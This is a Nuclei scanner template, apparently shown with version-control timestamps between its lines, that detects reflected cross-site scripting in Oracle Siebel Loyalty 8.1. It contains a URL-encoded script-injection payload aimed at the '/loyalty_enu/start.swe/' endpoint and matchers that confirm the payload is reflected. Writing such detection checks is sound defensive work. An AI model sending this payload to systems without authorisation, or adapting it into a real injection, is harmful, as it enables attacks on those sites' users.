2021-08-15 17:48:13 +00:00
id : oracle-siebel-xss
info :
2022-02-28 16:32:08 +00:00
name : Oracle Siebel Loyalty 8.1 - Cross-Site Scripting
2021-08-15 17:48:13 +00:00
author : dhiyaneshDK
severity : medium
2022-02-28 16:32:08 +00:00
description : A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
remediation : Upgrade to Siebel Loyalty version 8.2 or later.
reference :
- https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
- https://exploit-db.com/exploits/47762
2021-08-16 08:42:49 +00:00
tags : xss,oracle
2022-02-28 16:32:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-08-15 17:48:13 +00:00
requests :
- method : GET
path :
2021-08-16 08:42:49 +00:00
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-15 17:48:13 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-08-16 08:42:49 +00:00
- '</script><script>alert(document.domain)</script>'
- type : word
part : header
words :
- text/html
2021-08-15 17:48:13 +00:00
- type : status
status :
- 200
2022-02-28 16:32:08 +00:00
# Enhanced by cs on 2022/02/28